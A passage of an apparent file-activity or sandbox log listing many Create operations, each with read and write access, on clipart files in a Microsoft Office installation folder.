| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HM00172_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HM00426_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\HTECH_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00046_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00118_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00177_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00204_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00233_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00343_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00346_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00351_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00557_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00915_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00919_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00956_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\IN00957_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\INDST_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0075478.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086384.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086420.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086424.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086426.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086428.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086432.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0086478.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0089945.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0089992.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090027.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090087.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090089.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090149.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090390.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090777.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090779.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090781.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0090783.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0093905.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0098497.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099145.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099146.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099147.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099148.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099149.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099150.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099151.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099152.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099153.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099154.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099155.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099156.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099157.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099158.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099159.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099160.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099161.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099162.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099163.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099164.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099165.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099166.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099167.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099168.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099169.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099170.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099171.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099172.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099173.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099174.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099175.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099176.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099177.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099178.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099179.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099180.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099181.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099182.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099183.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099184.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099185.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099186.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099187.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099188.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099189.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099190.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099191.JPG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099192.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099193.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099194.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099195.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099196.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099197.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099198.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099199.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099200.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099201.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099202.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099203.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099204.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0099205.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101856.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101857.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101858.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101859.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101860.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101861.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101862.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101863.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101864.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101865.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101866.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101867.BMP | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0101980.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0102002.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0102594.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0102762.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0102984.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0103058.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0103262.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0103402.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0103812.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0103850.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105230.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105232.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105234.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105238.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105240.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105244.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105246.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105250.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105266.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105272.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105276.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105280.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105282.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105286.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105288.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105292.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105294.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105298.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105306.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105320.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105328.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105332.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105336.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\J0105338.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
